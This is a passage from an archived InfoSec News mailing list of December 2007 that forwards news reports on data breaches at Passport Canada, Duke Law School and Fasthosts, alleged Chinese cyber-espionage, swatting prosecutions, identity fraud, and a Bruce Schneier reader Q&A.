computers to commit financial fraud, attack web sites with > floods of traffic and send spam. The crimes at issue involved more > than $20 million in losses, according to the FBI Once again: Taking down the army of a botmaster of millions without disabling the botnet just makes sure the treasures of bot-armies past will be handed down to the next script kiddie in line. Even though the first attempt at this was bungled by a child not experienced in matters failed, I think its worth another shot to send an "update your security and uninstall" final release before just leaving these willing combatants to another "dick-tater", as long as the software the FBi/NSA/SGC is audited by the open sores community.. -JP From alerts at infosecnews.org Wed Dec 5 00:20:20 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Passport applicant finds massive privacy breach Message-ID: http://www.theglobeandmail.com/servlet/story/RTGAM.20071204.wpassport1204/BNStory/National/home By Kenyon Wallace Globe and Mail December 4, 2007 A security flaw in Passport Canada's website has allowed easy access to the personal information - including social insurance numbers, dates of birth and driver's licence numbers - of people applying for new passports. The breach was discovered last week by an Ontario man completing his own passport application. He found he could easily view the applications of others by altering one character in the Internet address displayed by his Web browser. "I was expecting the site to tell me that I couldn't do that," said Jamie Laning of Huntsville. "I'm just curious about these things so I tried it, and boom, there was somebody else's name and somebody else's data." That data included social insurance numbers, driver's licence numbers and addresses. Also available were home and business phone numbers, a federal ID card number and even a firearms licence number. "This is exactly how identity theft happens," said Carlisle Adams, an Internet data security expert and professor at the University of Ottawa. "If you want to take out a mortgage, for example, this is the type of information the bank is going to ask for to make sure you're really the person you're claiming to be. Then all of a sudden there's a mortgage in someone else's name." Mr. Laning, 47, an IT worker at Algonquin Automotive, informed Passport Canada of the breach last week and the passport application site was suspended through yesterday morning. Passport Canada spokesman Fabien Lengelle acknowledged that a security breach occurred but said that it was repaired on Friday. Yesterday's closing of the website was caused by "problems of a different nature," he said "We've probed this issue today very thoroughly," Mr. Lengelle said. "This incident is an isolated anomaly. The online passport system is still a very highly secure application." But after the website resumed operation yesterday afternoon, a few keystrokes sufficed to reveal some of the personal information of passport applicants, including names, addresses and numbers for references and emergency contacts. "That's a concern because obviously there's a weakness in their system that exposes valuable personal information to viewing by people," said Colin McKay, a spokesman for the office of the federal Privacy Commissioner of Canada. "It's always a concern for us when agencies don't take all the security measures they can, especially an agency like Passport Canada that deals with basic documents." Jason Marsden, a Brampton resident whose social insurance and driver's licence numbers were accessed by Mr. Laning, said he was "totally surprised" to learn that his personal information was so readily available. "If you read the disclaimer on the website, it's supposed to use high-tech security," Mr. Marsden said in an interview. "You'd think it wouldn't be that bloody simple." The Passport Canada website states the federal agency is "committed to respecting the privacy of individuals who visit our Web site." The security breach follows two significant events concerning personal information. On Nov. 21, Justice Minister Rob Nicholson introduced legislation making it an offence to obtain, possess or traffic in people's identity information for the purposes of committing a crime. Just two days earlier, Britain's tax and customs service announced it had lost disks containing banking and personal data of 25 million people. Canadian law does not require organizations to disclose when they've suffered security breaches. In the United States the majority of states have enacted legislation requiring organizations to disclose security breaches within a specified period of time. "I think it's very clear that a strong, mandatory security-breach law is long overdue in this country and it's cases like these that highlight it," said Michael Geist, a law professor at the University of Ottawa. "The reality is, even with the resources and the best security people, you're only as good as your weakest link," Prof. Geist said. "One mistake can result in significant security breaches that can put huge amounts of personal information at risk." From alerts at infosecnews.org Wed Dec 5 00:20:37 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Mashups, SAAS Present Security Risks Message-ID: http://www.eweek.com/article2/0,1895,2227704,00.asp By Darryl K. Taft eWeek.com December 4, 2007 BOSTON -- The rise of mashups and similar technologies has given developers a way to build simple applications, but they're also opening up a new world of security issues. The risks involved with mashups and SAAS (software as a service) come because of the amount of sensitive data that can be exposed on the Internet. However, Jeremy Burton, CEO of Serena Software, which released its enterprise mashup platform Dec. 3, said the benefits of the technologies can outweigh the risks. "There are definitely security risks involved when exposing any URL on the Internet which contains confidential data behind it," Burton said at the XML 2007 conference here Dec. 3. "But the productivity of mashups and economics of SAAS are so compelling that enterprises will take steps to manage the risk and reap the benefits. A trip in a jet airliner has a thousand times more risk than a horse and cart but amazingly everybody still uses it." Burton spoke after a panel discussion at the show regarding the future of XML on the Web. Mashups rely on Web services to work, as they are combinations of various services. Web services are typically XML-based, and HTML is the language needed to design Web pages, upon which mashups reside. Rene Bonvanie, senior vice president of worldwide marketing for partners and online services at Serena, said that with mashups, "there are multiple layers at which security can be instrumentedfirst of all, at the source systems; second at the SOA [service-oriented architecture]/middleware architecture level; and third at the mashup platform level." There's no inherent security in SAAS, said Ron Schmelzer, an analyst with ZapThink. "You have to explicitly design that in," he said. "And by explicit, that means you have to design authentication and authorization into the way that the service responds to consumers. Furthermore, you have to deal with a new bread of denial-of-service attack that can target Service dependencies." Mashups, by their nature as a composition of services, don't introduce new security issues, Schmelzer said. "The security issue in composition is the problem of security context in which you have to deal with the fact that composing different systems might mean trying to span different identity domains, which is a significant problem for companies that have not made a prior investment in identity management systems," he said. That said, the security issue is not a fatal flaw for SAAS, mashups and SOA, Schmelzer said. "It just needs to be addressed," he said. "Properly designed SOA, SAAS or mashups can be every bit as secure as any other enterprise application system, which means [they can be] as good as the architects." Douglas Crockford, a senior JavaScript architect at Yahoo who is know for discovering the JavaScript Object Notation, said there's been nothing really new done to HTML since 1999, which has led to security problems and security risks down the line for technologies such as mashups. "We've been so distracted by XML that HTML has not gotten the attention it needs," said Crockford, who was on the panel at the show.. Moreover, he said, "mashups are interesting but, unfortunately, because of security problems, they're just too dangerous. We have to address the security problems of the platform and get them right. Mashups allow for taking data from several sources. The problem we have is there's no way of protecting the various agents from each other." In addition, an acquiring server can't know if it is getting the right thing, he said. A vicious script could get "full access to the screen and can ask anything of the user, including their password. It's inherently dangerous." Michael Day, founder of YesLogic and the architect of the Prince formatter, said XML does have a future on the Web, if only as a server technology. XML seems to have gone the way of other technologies, such as Java, that started out as client-side technologies and ended up in the server realm, Day said. "XML is still a vital part of the server infrastructure in many systems," he said. Crockford said XML will continue to be vital because "once something gets into the enterprise, it can take generations to get it out. You can still buy a COBOL compiler. XML is clearly trending down; it is not going to replace HTML on the Web." Michael Sperberg-McQueen, a member of the technical staff at the World Wide Web Consortium and one of the original editors of XML 1.0, also said XML has a future on the Web. "There were 200 or so people involved in the formation of XML," Sperberg-McQueen said. "One goal was very simple; I wanted to be able to write things in descriptive markup using a vocabulary I was familiar with." Moreover, "we won," Sperberg-McQueen said. "Every major browser supports the display of XML and client-side XSLT [Extensible Stylesheet Language Transformations]. XML will die when you rip it out of my cold, dead hands." From alerts at infosecnews.org Wed Dec 5 00:20:52 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] China hits back at 'slanderous and prejudiced' alert over cyber spies Message-ID: http://www.timesonline.co.uk/tol/news/world/asia/article3000697.ece By Jane Macartney in Beijing The Times December 5, 2007 China issued a furious response yesterday to a report in The Times that Chinese agencies were spying on British companies via the internet. The report on Saturday said that the Director-General of MI5 had sent letters to 300 executives and security chiefs at banks, accounting and legal firms warning them that Chinese state agencies were hacking into their systems and trying to steal confidential information. A Chinese Foreign Ministry spokesman said yesterday: The Chinese Government has always opposed any internet crimes, including hacking which is an international problem. Qin Gang added: We express strong dissatisfaction. It is a very irresponsible act. China has lodged a formal protest, claiming that the report was slanderous and prejudiced and ignored the political, economic and social progress made by the country. It also alleged that the report was an attempt to put obstacles in the way of improved ties between Britain and China. Gordon Brown is expected to make an official visit to Beijing in January. There was no indication that the report would result in those plans being delayed. The Times reported that the letter from Jonathan Evans, the head of MI5, had told recipients how to identify Chinese Trojans e-mails carrying software designed to hack into a computer network and feed back confidential data. People who had seen the letter told The Times that the security forces believed companies doing business in China were under particular threat from hackers. The hackers are thought to include specialists with links to the Peoples Liberation Army (PLA). Computer experts have also accused hackers connected to the Chinese military of carrying out cyber attacks on the Pentagon, the British Parliament and the German Chancellery. Analysts who monitor the activities of the highly secretive PLA said that the cyber spies were careful to cover their tracks to conceal any links to the Chinese authorities, particularly the military. Hackers are usually based outside China in Russia, Central Asia and in Europe and are not directly tied to the PLA but are manipulated or managed through other agencies. Andrew Yang, the secretary-general of the Taiwan-based Chinese Council of Advanced Policy Studies and an expert on the PLA, told The Times: Information warfare in China is mostly conducted by the private sector so it is difficult to identify who is really behind this. He described the methods as highly decentralised but employing systems to ensure that any information garnered got back to state security organisations in China. For its part, China has not only denied that it is engaged in any cyber crime but also claimed that its own networks had also been targeted. From alerts at infosecnews.org Wed Dec 5 00:21:07 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Hackers may have accessed Duke information Message-ID: http://www.newsobserver.com/news/story/811419.html By Marlon A. Walker staff writer Dec 04, 2007 DURHAM - The Social Security numbers of about 1,400 prospective Duke Law School students may have been accessed by a hacker to the schools Web site, officials said Tuesday. An editor working on the site Thursday afternoon found several links that were not authorized, Duke Law School spokeswoman Melinda Vaughn said Tuesday evening. She said the site was immediately taken offline and an investigation into how the links were put on the site commenced. Vaughn said two databases one for students who have requested information on the law school and one for students who have already submitted applications were available for viewing by hackers. The database for interested students included the social security numbers of about 1,400 students. The issues for applicants were e-mail addresses and user-generated passwords used to check their application status to the law school. About 1,800 people were registered on the second database, she said. We were concerned that some of those people might have used the same passwords that they used on other sites, Vaughn said. In an e-mail to the affected students, associate dean of admissions William J. Hoye alluded to the fact that the information may not have been breached. "We have no evidence that the intruders actually downloaded or acquired any of this information," Hoye said in the e-mail, sent Tuesday. "Nonetheless, we know they had the opportunity and the tools to do so." The school is telling those affected to monitor their credit as a precaution. A phone number and e-mail address have also been set up for anyone to get answers to any questions regarding the breach. Vaughn said personal information of two current students was possibly compromised in the site breach. Those two, she said, were among the prospective students who had generated passwords to check their application status. Tuesday evening, a note on the Duke Law School Web site said some of its content continued to be unavailable for access. Vaughn said she expected the site to be back online as soon as Tuesday night. Were certainly continuing the investigation, she said. We still dont know what happened and who did it. From alerts at infosecnews.org Wed Dec 5 00:21:25 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] MI5 calls in KPMG to warn of espionage Message-ID: http://www.telegraph.co.uk/money/main.jhtml?xml=/money/2007/12/05/cnmi5105.xml By Russell Hotten 05/12/2007 The security service MI5 has asked consultants KPMG to lead a group to monitor cases of industrial espionage and co-ordinate information between Britain's leading companies. MI5 is increasingly concerned at attempts by foreign governments to hack into the computer systems of major firms, and last week accused China of trying to steal corporate secrets. KPMG, which works closely with the GCHQ listening station, is creating a "risk management information exchange", with a team of security and IT experts to assess "threat levels" and warn of imminent dangers. If a company discovers attempts to breach computer security through, say, viruses, the information can be passed to MI5 and other companies using the KPMG group. Last week, the director-general of MI5, Jonathan Evans, sent confidential letters to 300 chief executives and security heads at major companies warning about "electronic espionage" from "Chinese state organisations". It was later reported that Rolls-Royce and Royal Dutch Shell had faced attempts to breach their computer security systems. The US and France have accused China of industrial espionage - which Beijing strongly denied. China has yet to respond to the MI5 claims. Martin Jordan, principal adviser to KPMG on IT security, and head of the new group, said: "The intention is to give an early warning when threats appear. The information will be disseminated through a small group of people, but it will hopefully give MI5 a bigger overview of what is going on." From alerts at infosecnews.org Wed Dec 5 00:21:39 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Securing info systems could cost $28 billion, budget office says Message-ID: http://www.fcw.com/online/news/150986-1.html By Matthew Weigelt FCW.com December 4, 2007 The Congressional Budget Office estimates that the E-Government Reauthorization Act could cost the government about $29 billion over a four-year period, mainly for securing agencies information systems. The Office of Management and Budget said agencies spent about $5.5 billion in fiscal 2006 to meet the Federal Information Security Management Act, according to a CBO cost estimate report released today about the reauthorization legislation. Continuing the same updates, FISMA requirements would consume $27.9 billion of the $29 billion that the legislation would cost the government between 2008 and 2012, which includes adjustments for anticipated inflation, according to CBO. It also estimates that continuing current activities and starting new programs authorized by bill would make up the remaining $1.1 billion. But CBO believes agencies could save administrative costs through e-government as they collect information from the public and provide government services. CBO has no way to calculate how much, though, according to the report. The bill would authorize money for programs that improve how the government deploys services and accesses information. It also would centralize many agencies Internet-related activities. Specifically, it would authorize the General Services Administrations E-Government Fund for interagency projects and the Office of Personnel Managements IT personnel needs for the federal workforce. It would also authorize the National Institutes of Standards and Technologys research related to information security. The e-government authorization expired this year. The Senate Homeland Security and Governmental Affairs Committee approved the reauthorization act Nov. 14, but there is no House companion bill. CBO also released a cost estimate today for the Inspector General Reform Act, which the committee also approved Nov. 14. CBO estimates the bill would cost the government $83 million to implement. The reforms would make IG offices separate agencies, give them the same authority as the agencies they monitor and authorize them to submit their own annual budgets. Those provisions, among others, could cost about $53 million from 2008 to 2012, according to the report. The bill would establish an IG council to discuss areas of weakness in the IG community and investigate fraud allegations against IGs. CBO estimates that setting up the council would cost $25 million. Estimates for increasing salaries for IGs would cost $4 million, and semiannual reports to Congress would cost $1 million, according to CBO. From alerts at infosecnews.org Wed Dec 5 00:21:57 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Bruce Schneier Blazes Through Your Questions Message-ID: http://freakonomics.blogs.nytimes.com/2007/12/04/bruce-schneier-blazes-through-your-questions/ By Stephen J. Dubner Freakonomics December 4, 2007 Last week, we solicited your questions for Internet security guru Bruce Shneier. He responded in force, taking on nearly every question, and his answers are extraordinarily interesting, providing mandatory reading for anyone who uses a computer. He also plainly thinks like an economist: search below for crime pays to see his sober assessment of why its better to earn a living as a security expert than as a computer criminal. Thanks to Bruce and to all of you for participating. Heres a note that Bruce attached at the top of his answers: Thank you all for your questions. In many cases, Ive written longer essays on the topics youve asked about. In those cases, Ive embedded the links into the necessarily short answers I've given here. Q: Assuming we are both still here in 50 years, what do you believe will be the most incredible, fantastic, mind-blowing advance in computers/technology at that time? A: Fifty years is a long time. In 1957, fifty years ago, there were fewer than 2,000 computers total, and they were essentially used to crunch numbers. They were huge, expensive, and unreliable; sometimes, they caught on fire. There was no word processing, no spreadsheets, no e-mail, and no Internet. Programs were written on punch cards or paper tape, and memory was measured in thousands of digits. IBM sold a disk drive that could hold almost 4.5 megabytes, but it was five-and-a-half feet tall by five feet deep and would just barely fit through a standard door. Read the science fiction from back then, and youd be amazed by what they got wrong. Sure, they predicted smaller and faster, but no one got the socialization right. No one predicted eBay, instant messages, or blogging. Moores Law predicts that in fifty years, computers will be a billion times more powerful than they are today. I dont think anyone has any idea of the fantastic emergent properties you get from a billion-times increase in computing power. (I recently wrote about what security would look like in ten years, and that was hard enough.) But I can guarantee that it will be incredible, fantastic, and mind-blowing. Q: With regard to identity theft, do you see any alternatives to data being king? Do you see any alternative systems which will mean that just knowing enough about someone is not enough to commit a crime? A: Yes. Identity theft is a problem for two reasons. One, personal identifying information is incredibly easy to get; and two, personal identifying information is incredibly easy to use. Most of our security measures have tried to solve the first problem. Instead, we need to solve the second problem. As long as its easy to impersonate someone if you have his data, this sort of fraud will continue to be a major problem. The basic answer is to stop relying on authenticating the person, and instead authenticate the transaction. Credit cards are a good example of this. Credit card companies spend almost no effort authenticating the person hardly anyone checks your signature, and you can use your card over the phone, where they cant even check if youre holding the card and spend all their effort authenticating the transaction. Of course its more complicated than this; I wrote about it in more detail here and here. Q: Whats the next major identity verification system? A: Identity verification will continue to be the hodge-podge of systems we have today. Youre recognized by your face when you see someone you know; by your voice when you talk to someone you know. Open your wallet, and youll see a variety of ID cards that identify you in various situations some by name and some anonymously. Your keys identify you as someone allowed in your house, your office, your car. I dont see this changing anytime soon, and I dont think it should. Distributed identity is much more secure than a single system. I wrote about this in my critique of REAL ID. Q: If we can put a man on the moon, why in the world cant we design a computer that can cold boot nearly instantaneously? I know about hibernation, etc., but when I do have to reboot, I hate waiting those three or four minutes. A: Of course we can; Amiga was a fast booting computer, and OpenBSD boxes boot in less than a minute. But the current crop of major operating systems just dont. This is an economics blog, so you tell me: why dont the computer companies compete on boot-speed? Q: Considering the carelessness with which the government (state and federal) and commercial enterprises treat our confidential information, is it essentially a waste of effort for us as individuals to worry about securing our data? A: Yes and no. More and more, your data isnt under your direct control. Your e-mail is at Google, Hotmail, or your local ISP. Online merchants like Amazon and eBay have records of what you buy, and what you choose to look at but not buy. Your credit card company has a detailed record of where you shop, and your phone company has a detailed record of who you talk to (your cell phone company also knows where you are). Add medical databases, government databases, and so on, and theres an awful lot of data about you out there. And data brokers like ChoicePoint and Acxiom collect all of this data and more, building up a surprisingly detailed picture on all Americans. As you point out, one problem is that these commercial and government organizations dont take good care of our data. Its an economic problem: because these parties dont feel the pain when they lose our data, they have no incentive to secure it. I wrote about this two years ago, stating that if we want to fix the problem, we must make these organizations liable for their data losses. Another problem is the law; our Fourth Amendment protections protect our data under our control which means in our homes, in our cars, and on our computers. We dont have nearly the same protection when we give our data to some other organization for use or safekeeping. That being said, theres a lot you can do to secure your own data. I give a list here. Q: How do you remember all of your passwords? A: I cant. No one can; there are simply too many. But I have a few strategies. One, I choose the same password for all low-security applications. There are several Web sites where I pay for access, and I have the same password for all of them. Two, I write my passwords down. Theres this rampant myth that you shouldnt write your passwords down. My advice is exactly the opposite. We already know how to secure small bits of paper. Write your passwords down on a small bit of paper, and put it with all of your other valuable small bits of paper: in your wallet. And three, I store my passwords in a program I designed called Password Safe. Its is a small application Windows only, sorry that encrypts and secures all your passwords. Here are two other resources: one concerning how to choose secure passwords (and how quickly passwords can be broken), and one on how lousy most passwords actually are. [...] From alerts at infosecnews.org Thu Dec 6 04:02:02 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Hackers force mass website closures Message-ID: http://technology.timesonline.co.uk/tol/news/tech_and_web/article3007298.ece By Simon de Bruxelles The Times December 6, 2007 Hundreds of websites have been shut down temporarily by one of the largest web hosting companies in Britain after the personal details of customers were stolen by computer hackers. The hackers managed to access the master database of Fasthosts for information, including addresses, bank details, e-mails and passwords. The action is expected to lose vital business for hundreds of small companies in the run-up to Christmas. Fasthosts claimed that it had no option other than to perform an emergency shutdown after it discovered that the hackers had tried to use information gleaned from its servers. New passwords had to be sent out by post rather than e-mail to avoid the information being compromised again. Fasthosts was founded by Andrew Michael when he was still at school in Cheltenham. Mr Michael, 27, sold the business, which sells domain names and space on computer servers, to a German firm. The company discovered a network intrusion in October and recommended that users change their passwords. Last week, staff noticed unusual activity on some of its sites and closed down all those that had not yet changed their passwords, as well as some that had. Among the companies affected by the shutdown was EU Reporter, a small, web-based business that makes money from downloads and web advertising. Chris White, the owner, said that his downloads went from 47,000 a week to nothing and subscribers assumed that he had gone out of business. He said: The loss of readership on my site is incredibly significant to my business. Ive lost thousands of pounds and there are literally thousands more out there like me. Ive got a pile of letters and e-mails from long-standing customers saying theyre sorry weve gone bust. This has been a crime turned into a farce and I dont know if well survive. Kohul Thiagarajah, another client of Fasthosts who manages bookings for taxi companies, said: I had my clients screaming at me for not being able to access their e-mails or their bookings. Barry Wise, who manages 100 sites, said: This is worse than being hacked because I now just have to wait for the post. I cant call them because their phone lines are overwhelmed. A spokesman for Fasthosts Internet Ltd said: Last month Fasthosts wrote to all its customers to advise them that the company had discovered a network intrusion involving a Fasthosts server and, as a precautionary measure, recommended that all customers update their passwords. Fasthosts was made aware that a very small number of customers, who did not change their passwords, had experienced a compromise. As a result, Fasthosts implemented automatic password changes. We apologise to those customers affected for any inconvenience. David Roberts, the chief executive of the Corporate IT Forum, which shares expertise among its companies, said: This could well be the biggest internet attack of its kind. The criminals could theoretically have taken everything on the database. Police are investigating the network intrusion. From alerts at infosecnews.org Thu Dec 6 04:03:36 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Mobile Data a Moving Liability Message-ID: http://www.darkreading.com/document.asp?doc_id=140698 By Terry Sweeney Dark Reading December 5, 2007 SAN FRANCISCO -- By his own account, Tory Skyers lives on the edge -- the storage edge. He defines that place as the point in the enterprise network where any kind of mobile device contributes content to the SAN. This device menu runs the gamut from iPod, to Zune, PSP, Treo, Blackberry, Psion, laptop or desktop computer, USB flash drive, and external hard drive, to name a few. He uses two incentives to get unthinking users to follow policy or stop doing dumb things. "Fear and money are great motivators," he told an audience here at the Storage Decisions conference this morning. "What is that data worth to you on your laptop, on your iPhone -- in monetary terms? What if you didn't have your contacts list saved?" said Skyers, senior systems engineer for Prudential Fox & Roach Realtors. That typically gets users thinking. He cited a recent example of an executive who wanted to store his iTunes directory on the company server. "I showed him that it would cost $670 per user for every 14 days of storage for that iTunes volume," Skyers said. Factor in five other users at more than $1,300 a month and suddenly it gives users a more concrete incentive to set an example and enforce such acceptable use policies within their workgroups, he added. IT should not be immune from enforcement, Skyers said. Consequently, when he wants to take a gander at jpegs of loved ones or work on a personal document, he plugs in the 8-Gbyte USB drive he keeps on his keychain and none of it gets backed up to company servers. Skyers encouraged storage pros to do some social networking of their own. Reach out to the marketing department to help come up with catchy ways to get people to be smarter about what they save and how they use the Internet. If the legal department hasn't already thought it through, remind them that the Bank of America got fined millions of dollars daily for its inability to produce emails. Ask human resources to get involved to give the policy some teeth, whether it's a reprimand or something more draconian. "They enjoy that," Skyers said, to appreciative nods from the audience. He also encouraged more intra-departmental discussion within IT. "How many times have you heard, 'I'm a security guy, I don't wanna look at your hard drive'?" he asked. Those are conversations that businesses of all sizes need to have to make sure artificial fiefdoms don't compromise the company. IT can also step in and create sanctioned alternatives like memberships to P2P file-sharing services that operate legally. And they can get more proactive by deploying desktop management programs like Desktop Authority and Powerfuse, which limit user's ability to store outside permitted folders, and restrict executables like Google Search, Skyers said. Other controls, like SurfControl Mobile Filter, limit access to certain Websites and protocols when the user is outside the network or VPN, and prevents downloading unauthorized data content. From alerts at infosecnews.org Thu Dec 6 04:03:50 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Phone phreaks spoof LSD-induced multiple homicide Message-ID: http://www.theregister.co.uk/2007/12/05/swat_conspiracy_guilty_pleas/ By Dan Goodin in San Francisco The Register 5th December 2007 Three more individuals have admitted they participated in a series of phone phreak hoaxes that prompted raids by armed special weapons and tactic police teams on the homes of unsuspecting victims. Jason Trowbridge, of Louisiana and Texas, and Chad Ward of Texas pleaded guilty to multiple felonies, including conspiracy, access device fraud and unauthorized access of a protected computer. Each faces maximum penalties of five years in prison, fines of $250,000 and costs for restitution. As previously reported [1], Stuart Rosoff also pleaded guilty to charges in connection with the pranks, which over a course of almost five years snared more than 100 victims and resulted in as much as $250,000 in losses, according to court documents. Angela Roberson, who was charged alongside the trio, also entered a guilty plea but court documents did not elaborate. A sentencing hearing for Trowbridge is scheduled for late February. Hearings for Ward and Roberson are scheduled for mid March. Swatters, as the malicious pranksters are referred to, use a combination of social engineering, phone phreaking prowess and computer hacking to spoof the phone numbers of individuals they want to harass. They then make emergency calls to police departments and report crimes in process, in many cases prompting a response from SWAT teams who conduct emergency raids on the homes of people whose numbers were spoofed. In many cases, the victims were fellow participants in telephone party lines, which largely act as the phone equivalent of internet relay chat groups. Trowbridge, who went by the names "Jason from California" and "John from California," furthered the scheme by mining personal information about the victims from a host of sources, including consumer reporting agencies, pizza delivery records and newspaper subscription records, according to court documents signed by the defendant. The personal information Trowbridge provided allowed the gang to make fake emergency calls that had the ring of authenticity. In one case, they posed as an Alvarado, Texas man whose daughter was a party line participant. They told a police dispatcher that he had shot and killed members of his family and was armed with an AK47 machine gun. The caller, who claimed to be high on hallucinogenic drugs, then threatened to kill his remaining hostages unless he was given $50,000 and safe passage out of the country. Police responded by sending police to the residence of the real man. In September of last year, Ward himself was swatted by members of the gang. But just a month later, as he admitted in court documents filed last month, he offered money to anyone who would carry out a Swat attack on the Alvarado family. Ward, who went by the name "Dark Angel," also confessed to obtaining personal information on victims by socially engineering telephone company employees. The documents provide other colorful details. Among them, Rosoff threatened to have the phone service of a Cheboygan, Michigan woman disconnected unless she agreed to provide him with phone sex. When she refused, Rosoff used social engineering to terminate her phone service. He also made false reports to police claiming the woman's children were being abused and discussed ways of having her falsely arrested. During the course of the conspiracy - which lasted from late 2002 to June of this year and involved as many as 20 individuals - the participants also initiated calls to employers, landlords, families and friends of party line members they held a grudge against. Some of the members who refused to stop using the line found their friends and families swatted. The case was investigated by the FBI field office in Dallas and prosecuted the the US Attorney's Office for the Northern District of Texas. [1] http://www.theregister.co.uk/2007/11/19/911_phone_phreakers/ From alerts at infosecnews.org Thu Dec 6 04:04:09 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Couple charged with living high life on neighbours' accounts Message-ID: http://www.guardian.co.uk/usa/story/0,,2222534,00.html By Ed Pilkington in New York December 5, 2007 Guardian Unlimited The gallery of photographs told one story: a good-looking couple smiling to camera in front of the Eiffel Tower, riding horses on a white sand beach in Hawaii, sporting matching red swimwear in a luxury seaside resort. When police officers searched the Philadelphia flat of Jocelyn Kirsch and Edward Anderton they uncovered a different story. They found four computers, a scanner, two printers and a machine that makes identity cards - the equipment needed to support what detectives now believe was a two-year, $100,000 (49,000) spending spree funded largely by fraud. On Friday the couple were charged with identity fraud, forgery and a host of other counts. The police investigation began last month after the couple's neighbour complained that her identity had been stolen. The neighbour said she had been told to pick up a package at a nearby delivery station even though she had ordered nothing, and police watched as Kirsch and Anderton picked up the package, which turned out to be luxury lingerie from London. Piecing together events, detectives now allege that the couple, who were both privately educated at good schools and colleges, cheated several people in their apartment building. "They were like a parasite that infected that building," Detective Terry Sweeney told the Associated Press. "They were two young people that were given many gifts in life. And the very best thing they could do was victimise other people." In their flat they had fake drivers' licences, numerous credit cards and keys to the apartments and postal boxes of neighbours. There was also $18,000 in cash, and a copy of The Art of Cheating: A Nasty Little Book for Tricky Little Schemers and Their Hapless Victims [1]. Their travels took them to Paris, London, Hawaii and the Turks & Caicos Islands. Kirsch, 22, a student at Drexel University in Philadelphia, treated herself to a $2,200 hair extension using a false cheque. Anderton, aged 25, a graduate of the Ivy League University of Pennsylvania, was recently sacked from a job as a financial analyst, though the reasons for his dismissal were unclear. So far police say they have found five victims of the couple's activities, one of who was stung for $30,000. [1] http://www.amazon.com/exec/obidos/ASIN/1416549137/c4iorg From alerts at infosecnews.org Thu Dec 6 04:04:21 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] HITBSecConf2007 Malaysia Videos Now Available Message-ID: Forwarded from: Praburaajan The videos from Hack In The Box Security Conference 2007 Malaysia is now available for download! The files were created in Quicktime, however if you're having trouble playing them on your platform, please ensure you have the latest 3IVX codec installed. Time to fire up your favorite Bit Torrent clients and please remember to seed! go to http://video.hitb.org/2007.html to download the torrents On a related note, the Call for Papers for HITBSecConf2008 - Dubai is still open. If you're interested in speaking at the upcoming event in the UAE, please take a look at the CFP page for details on how to submit. We are especially looking for more submissions from the EMEA region. From alerts at infosecnews.org Thu Dec 6 04:04:42 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Passport security breach repaired, official says Message-ID: http://www.theglobeandmail.com/servlet/story/RTGAM.20071205.wpassport05/BNStory/National/home By Kenyon Wallace Globe and Mail December 5, 2007 Passport Canada says that a security breach in its passport application website that allowed easy access to the personal information of applicants has been repaired. "We're definitely looking into how this happened, but right now, it's fixed," said Fabien Lengelle, a spokesman for Passport Canada. "We are very committed to security and we would like to reassure the Canadian public that passport online is a secure application." Mr. Lengelle added that the personal information of applicants is never stored online. However, an Ontario man applying online for a passport last Thursday discovered he could access personal information - such as social insurance numbers, birthdates and driver's licence numbers - of other applicants by altering one character in the Internet address displayed by his Web browser. Passport Canada shut the website down on Friday, but when it was reopened on Monday afternoon, the personal information of applicants could still be accessed. In November, 29,000 people entered their personal data into the website, according to Mr. Lengelle. During Question Period yesterday, Foreign Affairs Minister Maxime Bernier told the House of Commons that he spoke with Passport Canada CEO Grard Cossette and was assured that the security problem had been fixed. "Now the Internet site of Passport Canada is one of the most secure," Mr. Bernier said. The security breach discovery comes in the midst of an audit of Passport Canada's handling of personal information. The audit, undertaken by the office of the federal Privacy Commissioner in the fall, is examining whether the federal agency is meeting its obligations under the Privacy Act. Colin McKay, a spokesman for the Privacy Commissioner, said the audit will now include the website security breach. Mr. McKay said Privacy Commissioner Jennifer Stoddart would not comment on the security flaw until she received more information from investigators. The passport application website, launched in January, 2005, uses a combination of policy and technology - called Public Key Infrastructure - that is supposed to provide secure online working environments. To apply for a passport online, users must obtain an e-pass that allows access to services with enhanced security. The e-pass Canada website states that session cookies - small pieces of data specific to an applicant's computer that are exchanged with the website - may be used. But cookies are not the best way to ensure security, says Carlisle Adams, an Internet data security expert and professor at the University of Ottawa. "People can hijack cookies from other people's sessions or someone could log on to somebody else's browser through a virus or by physically using their computer," Mr. Adams said. "It's not foolproof security by any means." Identity theft in Canada is on the rise, fuelled in part by advances in technology, according to Inspector Barry Baxter, officer in charge of counterfeit and identity fraud with the RCMP. Insp. Baxter said personal information is usually stolen to obtain goods and services under someone else's name, or to assume someone else's identity. "You can submit false applications, apply for credit cards, apply for health services, and all those kinds of services that require you to identify yourself," Insp. Baxter said. Combatting identity theft is especially difficult because the crime is global, he added. "There's a different scam every minute of the day." The federal government is considering implementing legislation that would require private sector organizations to disclose security breaches. On Nov. 21, Justice Minister Rob Nicholson introduced legislation making it an offence to obtain, possess or traffic identity information for the purposes of committing a crime. Major security breaches The following are major security breaches in 2007: January: TJX Cos., parent company of retail outlets Winners and HomeSense, told the public that computer hackers may have up to two million Canadian credit card numbers. January: CIBC subsidiary Talvest Mutual Funds lost a computer file with account information for 470,000 customers while in transit between company offices. April: A computer disc containing social security numbers, addresses, and birthdates of almost three million patients went missing from Affiliated Computer Services, a private contractor handling health-care claims for the Department of Community Health in Atlanta. August: Monster.com announced that 